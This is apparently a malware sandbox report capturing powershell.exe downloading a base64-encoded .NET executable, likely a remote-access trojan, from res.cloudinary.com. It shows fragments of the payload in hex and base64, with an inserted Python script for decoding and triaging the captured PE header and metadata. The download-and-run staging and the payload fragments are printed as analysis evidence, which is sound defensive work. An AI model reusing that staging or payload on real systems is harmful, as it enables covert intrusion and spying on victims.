                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 41 70 79 74 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 63 58 6d 69 67 68 41 41 41 4b 46 32 38 69 41 41 41 4b 46 50 34 44 45 77 59 52 42 6a 6d 35 41 41 41 41 41 41 41 43 66 67 45 41 41 41 52 2b 41 67 41 41 42 41 63 61 6d 67 63 62 6d 6e 34 44 41 41 41 45 4b 42 73 41 41 41 5a 79 7a 51 41 41 63 43 67 51 41 41 41 47 4b 42 38 41 41 41 6f 6f 47 67 41 41 42 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 49 4a 41 51 42 77 42 78 65 61 4b 43 45 41 41 41 6f 48 46 35 6f 55 4b 43 4d 41 41 41 70 76 4a 41 41 41 43 67 63 59 6d 69 67 6c 41 41 41 4b 42 78 6d 61 4b 43 59 41 41 41 6f 48 46 35 6f 58 4b 41 55 41 41 41 59 41 41 4e 34 2b 4a 67 41 64 6a 53 6b 41 41 41 45 6c 46 6e 49 50 41 51 42 77 6f 69 55 58 42 71 49 6c 47
                                                                                          Data Ascii: AAAApytQAAcH4EAAAEKBoAAAZyyQAAcAcXmighAAAKF28iAAAKFP4DEwYRBjm5AAAAAAACfgEAAAR+AgAABAcamgcbmn4DAAAEKBsAAAZyzQAAcCgQAAAGKB8AAAooGgAABnLRAABwfgQAAAQoGgAABnIJAQBwBxeaKCEAAAoHF5oUKCMAAApvJAAACgcYmiglAAAKBxmaKCYAAAoHF5oXKAUAAAYAAN4+JgAdjSkAAAElFnIPAQBwoiUXBqIlG
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 4b 46 50 34 42 45 77 63 52 42 79 77 6f 41 41 4a 79 30 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 34 4a 4b 43 45 41 41 41 6f 4f 43 51 34 47 4b 41 63 41 41 41 59 41 41 41 44 65 42 53 59 41 41 4e 34 41 44 67 6f 57 2f 67 45 54 43 42 45 49 4c 43 67 41 41 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 4c 4a 41 41 42 77 44 67 6b 6f 49 51 41 41 43 67 34 4a 44 67 59 6f 42 77 41 41 42 67 41 41 41 41 44 65 42 53 59 41 41 4e 34 41 4b 6b 45 30 41 41 41 41 41 41 41 41 79 77 41 41 41 46 73 41 41 41 41 6d 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 41 41 41 41 41 41 51 41 41 41 47 45 42 41 41 42 69 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 62 4d 41 63 41 54 67 41 41 41 41 51 41 41 42 45 41 41 42 71 4e 4d 41 41
                                                                                          Data Ascii: AAAKFP4BEwcRBywoAAJy0QAAcH4EAAAEKBoAAAZyyQAAcA4JKCEAAAoOCQ4GKAcAAAYAAADeBSYAAN4ADgoW/gETCBEILCgAAnLRAABwfgQAAAQoGgAABnLJAABwDgkoIQAACg4JDgYoBwAABgAAAADeBSYAAN4AKkE0AAAAAAAAywAAAFsAAAAmAQAABQAAAA8AAAEAAAAAAQAAAGEBAABiAQAABQAAAA8AAAEbMAcATgAAAAQAABEAABqNMAA
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 51 42 54 56 41 41 46 44 77 41 41 41 52 73 77 41 67 42 75 41 41 41 41 43 51 41 41 45 51 41 41 41 48 49 56 41 67 42 77 63 30 41 41 41 41 6f 6f 51 51 41 41 43 6d 39 43 41 41 41 4b 43 69 73 6f 42 6d 39 44 41 41 41 4b 64 42 6f 41 41 41 45 4c 41 41 64 79 55 51 49 41 63 47 39 45 41 41 41 4b 4b 45 55 41 41 41 6f 4d 45 67 49 6f 52 67 41 41 43 67 33 65 4b 67 5a 76 52 77 41 41 43 69 33 51 33 67 73 47 4c 41 63 47 62 30 67 41 41 41 6f 41 33 41 44 65 43 69 59 41 63 74 38 42 41 48 41 4e 33 67 68 79 33 77 45 41 63 41 30 72 41 41 6b 71 41 41 41 42 48 41 41 41 41 67 41 59 41 44 52 4d 41 41 73 41 41 41 41 41 41 41 41 42 41 46 6c 61 41 41 6f 50 41 41 41 42 47 7a 41 44 41 4d 6f 41 41 41 41 4b 41 41 41 52 41 41 42 2b 53 51 41 41 43 67 6f 41 63 6d 73 43 41 48 42 7a 4d
                                                                                          Data Ascii: AAAQBTVAAFDwAAARswAgBuAAAACQAAEQAAAHIVAgBwc0AAAAooQQAACm9CAAAKCisoBm9DAAAKdBoAAAELAAdyUQIAcG9EAAAKKEUAAAoMEgIoRgAACg3eKgZvRwAACi3Q3gsGLAcGb0gAAAoA3ADeCiYAct8BAHAN3ghy3wEAcA0rAAkqAAABHAAAAgAYADRMAAsAAAAAAAABAFlaAAoPAAABGzADAMoAAAAKAAARAAB+SQAACgoAcmsCAHBzM
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 49 44 39 43 44 77 42 76 58 77 41 41 43 67 41 6c 49 44 39 43 44 77 42 76 59 41 41 41 43 67 43 41 43 51 41 41 42 48 34 4a 41 41 41 45 66 67 45 41 41 41 52 2b 41 67 41 41 42 43 68 68 41 41 41 4b 62 32 49 41 41 41 6f 41 46 34 41 4b 41 41 41 45 4b 41 34 41 41 41 59 6f 49 41 41 41 42 67 41 55 2f 67 59 65 41 41 41 47 63 32 4d 41 41 41 6f 4b 42 68 51 67 4d 48 55 41 41 43 41 77 64 51 41 41 63 32 51 41 41 41 71 41 44 41 41 41 42 48 4e 6c 41 41 41 4b 67 41 73 41 41 41 51 41 33 68 59 6d 41 42 61 41 43 67 41 41 42 43 43 34 43 77 41 41 4b 42 45 41 41 41 6f 41 41 4e 34 41 41 48 34 4b 41 41 41 45 46 76 34 42 43 77 63 36 45 66 2f 2f 2f 7a 67 33 41 51 41 41 41 41 42 2b 43 51 41 41 42 42 55 57 62 32 59 41 41 41 6f 73 44 58 34 4a 41 41 41 45 62 32 63 41 41 41 6f 57 4d 51 39
                                                                                          Data Ascii: ID9CDwBvXwAACgAlID9CDwBvYAAACgCACQAABH4JAAAEfgEAAAR+AgAABChhAAAKb2IAAAoAF4AKAAAEKA4AAAYoIAAABgAU/gYeAAAGc2MAAAoKBhQgMHUAACAwdQAAc2QAAAqADAAABHNlAAAKgAsAAAQA3hYmABaACgAABCC4CwAAKBEAAAoAAN4AAH4KAAAEFv4BCwc6Ef///zg3AQAAAAB+CQAABBUWb2YAAAosDX4JAAAEb2cAAAoWMQ9
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 45 41 63 33 45 41 41 41 6f 4b 63 32 55 41 41 41 6f 4c 63 32 55 41 41 41 6f 4d 41 69 67 59 41 41 41 47 41 78 55 58 4b 42 67 41 41 41 6f 4e 42 77 49 57 43 52 61 61 62 32 77 41 41 41 70 76 61 67 41 41 43 67 41 49 41 67 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 41 4b 4f 61 51 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 46 6c 76 61 67 41 41 43 67 41 47 42 32 39 72 41 41 41 4b 62 33 49 41 41 41 6f 41 42 67 68 76 61 77 41 41 43 6d 39 79 41 41 41 4b 41 41 64 76 56 67 41 41 43 67 41 49 62 31 59 41 41 41 6f 41 42 6d 39 7a 41 41 41 4b 45 77 51 72 41 42 45 45 4b 69 35 7a 49 77 41 41 42 6f 41 55 41 41 41 45 4b 69 49 43 4b 42 59 41 41 41 6f 41 4b 6a 59 41 66 67 59 41 41 41 52 76 64 41 41 41 43 67 41 71 49 67 49 6f 46 67 41 41 43 67 41 71 61
                                                                                          Data Ascii: EAc3EAAAoKc2UAAAoLc2UAAAoMAigYAAAGAxUXKBgAAAoNBwIWCRaab2wAAApvagAACgAIAgkWmm9sAAAKA29sAAAKWAKOaQkWmm9sAAAKA29sAAAKWFlvagAACgAGB29rAAAKb3IAAAoABghvawAACm9yAAAKAAdvVgAACgAIb1YAAAoABm9zAAAKEwQrABEEKi5zIwAABoAUAAAEKiICKBYAAAoAKjYAfgYAAARvdAAACgAqIgIoFgAACgAqa
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 43 49 41 41 67 45 41 41 48 6f 44 41 41 42 74 41 42 59 41 4a 51 41 44 41 52 41 41 46 77 41 41 41 44 30 41 47 67 41 6c 41 42 4d 42 41 41 42 73 41 41 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 47 38 42 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 30 41 45 41 41 49 30 41 47 77 41 6e 41 42 4d 42 41 41 44 73 41 51 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 46 49 43 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 79 51 41 41 41 49 30 41 47 77 41 6e 41 42 59 41 58 67 31 68 41 52 59 41 53 51 31 68 41 52 59 41 50 51 52 68 41 52 59 41 7a 77 31 68 41 52 59 41 48 41 35 68 41 52 59 41 77 67 31 34 41 68 59 41 69 41 70 68 41 52 59 41 4e 77 68 38 41 68 45 41 42 41 32 41 41 68 59 41 4d 51 53 45 41 68 45 41 70 41 69 48 41 68 45 41 73 77 79 4c 41 6a 4d 42 4f 51 4f
                                                                                          Data Ascii: ACIAAgEAAHoDAABtABYAJQADARAAFwAAAD0AGgAlABMBAABsAAAAjQAbACcAEwEAAG8BAACNABsAJwATAQAA0AEAAI0AGwAnABMBAADsAQAAjQAbACcAEwEAAFICAACNABsAJwATAQAAyQAAAI0AGwAnABYAXg1hARYASQ1hARYAPQRhARYAzw1hARYAHA5hARYAwg14AhYAiAphARYANwh8AhEABA2AAhYAMQSEAhEApAiHAhEAswyLAjMBOQO
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 45 41 6d 77 55 41 41 41 45 41 77 77 77 41 41 41 45 41 73 77 4d 41 41 41 45 41 39 41 30 41 41 41 49 41 69 41 6f 41 41 41 45 41 79 77 6b 41 41 41 49 41 30 77 4d 4a 41 4e 6f 4b 41 51 41 52 41 4e 6f 4b 42 67 41 5a 41 4e 6f 4b 43 67 41 70 41 4e 6f 4b 45 41 41 78 41 4e 6f 4b 45 41 41 35 41 4e 6f 4b 45 41 42 42 41 4e 6f 4b 45 41 42 4a 41 4e 6f 4b 45 41 42 52 41 4e 6f 4b 45 41 42 5a 41 4e 6f 4b 45 41 42 68 41 4e 6f 4b 46 51 42 70 41 4e 6f 4b 45 41 42 78 41 4e 6f 4b 45 41 43 42 41 4e 6f 4b 42 67 43 4a 41 4e 6f 4b 42 67 43 35 41 4e 6f 4b 42 67 41 68 41 64 6f 4a 48 77 43 68 41 4e 6f 4b 4a 41 41 70 41 65 77 4d 48 77 43 52 41 4e 6f 4b 4c 41 41 78 41 64 30 4d 4d 67 42 35 41 4e 6f 4b 42 67 43 70 41 4e 6f 4b 42 67 41 35 41 64 63 4d 53 41 42 4a 41 58 51 4f 55 77 43 70 41
                                                                                          Data Ascii: EAmwUAAAEAwwwAAAEAswMAAAEA9A0AAAIAiAoAAAEAywkAAAIA0wMJANoKAQARANoKBgAZANoKCgApANoKEAAxANoKEAA5ANoKEABBANoKEABJANoKEABRANoKEABZANoKEABhANoKFQBpANoKEABxANoKEACBANoKBgCJANoKBgC5ANoKBgAhAdoJHwChANoKJAApAewMHwCRANoKLAAxAd0MMgB5ANoKBgCpANoKBgA5AdcMSABJAXQOUwCpA
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 44 77 42 41 56 67 41 41 45 41 42 51 56 67 41 41 45 51 42 59 56 67 41 41 45 67 42 67 56 67 41 41 45 77 41 45 67 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 42 51 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 56 41 77 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 56 41 73 55 49 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 34 43 43 77 30 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 67 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 65 41 76 30 44 41 41 41 41 41 41 73 41 41 67 41 4d 41 41 63 41 44 51 41 4a 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 41 41 41 41 41 41 41 50 44 34
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb
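The sessions in this part of the report are repeated fetches of one object (the chunks at the top of this section belong to an earlier session carrying the same body): powershell.exe sends a bare three-line GET with no User-Agent to res.cloudinary.com (151.101.1.137:443), and the server answers with Content-Type: text/plain and a 22528-character body that begins TVqQAAMAAAAEAAAA, which is the base64 encoding of an MZ header followed by the usual "This program cannot be run in DOS mode" stub. 22528 base64 characters decode to 16896 bytes (less any trailing "=" padding), and the last chunk the report shows decodes to CLR metadata names such as mscorlib, System.IO, System.Collections.Generic, EXECUTION_STATE, ES_CONTINUOUS, GetAV and GetCamera. The Python below is an added example for triaging such a capture offline; it is not part of the Joe Sandbox report or of the sample. Its inputs are the report's own request line and its first and last displayed data chunks for this session, the header layout follows the PE/COFF specification, and nothing beyond the fields visible in those chunks is assumed.

```python
import base64
import struct

# Constructed inputs, copied from the report's Data Ascii column (Joe Sandbox shows
# only the first 255 characters of each 1378-byte chunk).  FIRST_CHUNK opens the
# 10:25:29 UTC response body; its 44-character run of "A" (33 zero bytes of the DOS
# header) is written as a repeat so it cannot be miscounted.  LATER_CHUNK is the last
# chunk the report displays for the same session.
FIRST_CHUNK = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA" + "A" * 44
    + "gAAAAA4fug4AtAnNIbgBTM0h"
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu"
    + "DQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgA"
    + "AAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA"
)
LATER_CHUNK = (
    "U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhF"
    "AEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJ"
    "TlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lz"
    "dGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb"
)
# The request exactly as the report's OUT row shows it (116 bytes with the blank line).
REQUEST = (
    "GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1\r\n"
    "Host: res.cloudinary.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

IMAGE_FILE_MACHINE_I386 = 0x014C
PE32_MAGIC = 0x010B


def decode_fragment(text: str, skip: int = 0) -> bytes:
    """Base64-decode a captured fragment: drop `skip` leading characters, ignore
    whitespace, and tolerate a final group that the capture cut short."""
    s = "".join(text.split())[skip:]
    if len(s) % 4 == 1:            # one leftover character holds no whole byte
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def looks_like_base64_pe(text: str) -> bool:
    """Cheap triage for a text/plain body: "MZ" base64-encodes to a "TV" prefix
    whatever the third byte is, so confirm by decoding the first two groups."""
    s = text.lstrip()
    return s.startswith("TV") and decode_fragment(s[:8])[:2] == b"MZ"


def parse_pe_header(blob: bytes) -> dict:
    """Read the DOS header, COFF file header and the start of the optional header.
    Raises ValueError if the bytes are not a PE image or are too short."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    try:
        (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
        if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("no PE signature at e_lfanew")
        coff = e_lfanew + 4
        (machine, nsections, timestamp, _symptr, _nsyms,
         opt_size, characteristics) = struct.unpack_from("<HHIIIHH", blob, coff)
        opt = coff + 20
        (magic, _maj, _min, size_of_code, size_init, _size_uninit,
         entry, base_of_code) = struct.unpack_from("<HBBIIIII", blob, opt)
        if magic == PE32_MAGIC:    # PE32 carries a BaseOfData field before ImageBase
            _base_of_data, image_base, section_align = struct.unpack_from("<III", blob, opt + 24)
        else:                      # PE32+ (0x20B): 64-bit ImageBase, no BaseOfData
            image_base, section_align = struct.unpack_from("<QI", blob, opt + 24)
    except struct.error as exc:
        raise ValueError("header truncated") from exc
    return {
        "e_lfanew": e_lfanew, "machine": machine, "sections": nsections,
        "timestamp": timestamp, "opt_size": opt_size,
        "characteristics": characteristics, "magic": magic,
        "size_of_code": size_of_code, "size_of_init_data": size_init,
        "entry_point": entry, "base_of_code": base_of_code,
        "image_base": image_base, "section_align": section_align,
    }


def printable_ratio(blob: bytes) -> float:
    """Share of bytes that are NUL or printable ASCII (what a CLR #Strings heap looks like)."""
    return sum(b == 0 or 32 <= b < 127 for b in blob) / len(blob) if blob else 0.0


def best_alignment(text: str) -> tuple:
    """A chunk cut at a byte offset that is not a multiple of 4 decodes to garbage
    until 0-3 leading characters are dropped; return (skip, bytes) for the offset
    whose output looks most like text."""
    return max(((s, decode_fragment(text, skip=s)) for s in range(4)),
               key=lambda c: printable_ratio(c[1]))


def strings_in(blob: bytes, min_len: int = 4) -> list:
    """NUL-separated printable runs, the way the CLR #Strings heap stores names."""
    return [p.decode("ascii") for p in blob.split(b"\0")
            if len(p) >= min_len and printable_ratio(p) == 1.0]


def header_names(request: str) -> list:
    """Header field names of a raw HTTP/1.x request, for spotting what is missing."""
    return [line.split(":", 1)[0] for line in request.split("\r\n")[1:] if ":" in line]


def base64_decoded_size(content_length: int, padding: int = 0) -> int:
    """Bytes a base64 body of content_length characters (no line breaks) decodes to."""
    return content_length * 3 // 4 - padding


if __name__ == "__main__":
    print({k: hex(v) for k, v in parse_pe_header(decode_fragment(FIRST_CHUNK)).items()})
    skip, blob = best_alignment(LATER_CHUNK)
    print("alignment skip:", skip, "names:", strings_in(blob))
    print("request headers:", header_names(REQUEST), "bytes:", len(REQUEST.encode()))
```

Run as a script it prints the parsed header, the recovered metadata names and the request's header names. Points worth reading off the output: the reconstructed request is exactly the 116 bytes the report counts, so the capture is complete and the missing User-Agent is a property of the downloader, not of the display; Characteristics 0x0022 is IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_LARGE_ADDRESS_AWARE, and Machine 0x014C with a PE32 optional header, ImageBase 0x400000 and an entry point at RVA 0x5616 is the shape of a small .NET executable; TimeDateStamp 0xEDF7D136 has its high bit set, which on Roslyn-built assemblies typically marks a deterministic-build hash rather than a compile time, so it cannot be used to date the build. The report cuts its data rows every 1378 bytes, which is not a multiple of 4, so every chunk after the first has to be realigned before it decodes; best_alignment does that by trying the four possible offsets and keeping the one that yields text.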


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 151.101.1.137 | 443 | 1720 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-11 10:25:36 UTC | 116 | OUT | GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
2024-12-11 10:25:37 UTC | 651 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 22528
    Content-Type: text/plain
    Etag: "cb75e1ff3f0a9c976292f34e67a24826"
    Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
    Date: Wed, 11 Dec 2024 10:25:36 GMT
    Vary: Accept-Encoding
    Strict-Transport-Security: max-age=604800
    Cache-Control: public, no-transform, immutable, max-age=2592000
    Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:25:36.938Z;desc=hit,rtt;dur=169
    Server: Cloudinary
    Timing-Allow-Origin: *
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
    x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 44 62 52 39 2b 30 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 67 41 4c 41 54 41 41 41 44 67 41 41 41 41 49 41 41 41 41 41 41 41 41 46 6c 59 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgAAAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 41 70 79 74 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 63 58 6d 69 67 68 41 41 41 4b 46 32 38 69 41 41 41 4b 46 50 34 44 45 77 59 52 42 6a 6d 35 41 41 41 41 41 41 41 43 66 67 45 41 41 41 52 2b 41 67 41 41 42 41 63 61 6d 67 63 62 6d 6e 34 44 41 41 41 45 4b 42 73 41 41 41 5a 79 7a 51 41 41 63 43 67 51 41 41 41 47 4b 42 38 41 41 41 6f 6f 47 67 41 41 42 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 49 4a 41 51 42 77 42 78 65 61 4b 43 45 41 41 41 6f 48 46 35 6f 55 4b 43 4d 41 41 41 70 76 4a 41 41 41 43 67 63 59 6d 69 67 6c 41 41 41 4b 42 78 6d 61 4b 43 59 41 41 41 6f 48 46 35 6f 58 4b 41 55 41 41 41 59 41 41 4e 34 2b 4a 67 41 64 6a 53 6b 41 41 41 45 6c 46 6e 49 50 41 51 42 77 6f 69 55 58 42 71 49 6c 47
                                                                                          Data Ascii: AAAApytQAAcH4EAAAEKBoAAAZyyQAAcAcXmighAAAKF28iAAAKFP4DEwYRBjm5AAAAAAACfgEAAAR+AgAABAcamgcbmn4DAAAEKBsAAAZyzQAAcCgQAAAGKB8AAAooGgAABnLRAABwfgQAAAQoGgAABnIJAQBwBxeaKCEAAAoHF5oUKCMAAApvJAAACgcYmiglAAAKBxmaKCYAAAoHF5oXKAUAAAYAAN4+JgAdjSkAAAElFnIPAQBwoiUXBqIlG
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 4b 46 50 34 42 45 77 63 52 42 79 77 6f 41 41 4a 79 30 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 34 4a 4b 43 45 41 41 41 6f 4f 43 51 34 47 4b 41 63 41 41 41 59 41 41 41 44 65 42 53 59 41 41 4e 34 41 44 67 6f 57 2f 67 45 54 43 42 45 49 4c 43 67 41 41 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 4c 4a 41 41 42 77 44 67 6b 6f 49 51 41 41 43 67 34 4a 44 67 59 6f 42 77 41 41 42 67 41 41 41 41 44 65 42 53 59 41 41 4e 34 41 4b 6b 45 30 41 41 41 41 41 41 41 41 79 77 41 41 41 46 73 41 41 41 41 6d 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 41 41 41 41 41 41 51 41 41 41 47 45 42 41 41 42 69 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 62 4d 41 63 41 54 67 41 41 41 41 51 41 41 42 45 41 41 42 71 4e 4d 41 41
                                                                                          Data Ascii: AAAKFP4BEwcRBywoAAJy0QAAcH4EAAAEKBoAAAZyyQAAcA4JKCEAAAoOCQ4GKAcAAAYAAADeBSYAAN4ADgoW/gETCBEILCgAAnLRAABwfgQAAAQoGgAABnLJAABwDgkoIQAACg4JDgYoBwAABgAAAADeBSYAAN4AKkE0AAAAAAAAywAAAFsAAAAmAQAABQAAAA8AAAEAAAAAAQAAAGEBAABiAQAABQAAAA8AAAEbMAcATgAAAAQAABEAABqNMAA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 51 42 54 56 41 41 46 44 77 41 41 41 52 73 77 41 67 42 75 41 41 41 41 43 51 41 41 45 51 41 41 41 48 49 56 41 67 42 77 63 30 41 41 41 41 6f 6f 51 51 41 41 43 6d 39 43 41 41 41 4b 43 69 73 6f 42 6d 39 44 41 41 41 4b 64 42 6f 41 41 41 45 4c 41 41 64 79 55 51 49 41 63 47 39 45 41 41 41 4b 4b 45 55 41 41 41 6f 4d 45 67 49 6f 52 67 41 41 43 67 33 65 4b 67 5a 76 52 77 41 41 43 69 33 51 33 67 73 47 4c 41 63 47 62 30 67 41 41 41 6f 41 33 41 44 65 43 69 59 41 63 74 38 42 41 48 41 4e 33 67 68 79 33 77 45 41 63 41 30 72 41 41 6b 71 41 41 41 42 48 41 41 41 41 67 41 59 41 44 52 4d 41 41 73 41 41 41 41 41 41 41 41 42 41 46 6c 61 41 41 6f 50 41 41 41 42 47 7a 41 44 41 4d 6f 41 41 41 41 4b 41 41 41 52 41 41 42 2b 53 51 41 41 43 67 6f 41 63 6d 73 43 41 48 42 7a 4d
                                                                                          Data Ascii: AAAQBTVAAFDwAAARswAgBuAAAACQAAEQAAAHIVAgBwc0AAAAooQQAACm9CAAAKCisoBm9DAAAKdBoAAAELAAdyUQIAcG9EAAAKKEUAAAoMEgIoRgAACg3eKgZvRwAACi3Q3gsGLAcGb0gAAAoA3ADeCiYAct8BAHAN3ghy3wEAcA0rAAkqAAABHAAAAgAYADRMAAsAAAAAAAABAFlaAAoPAAABGzADAMoAAAAKAAARAAB+SQAACgoAcmsCAHBzM
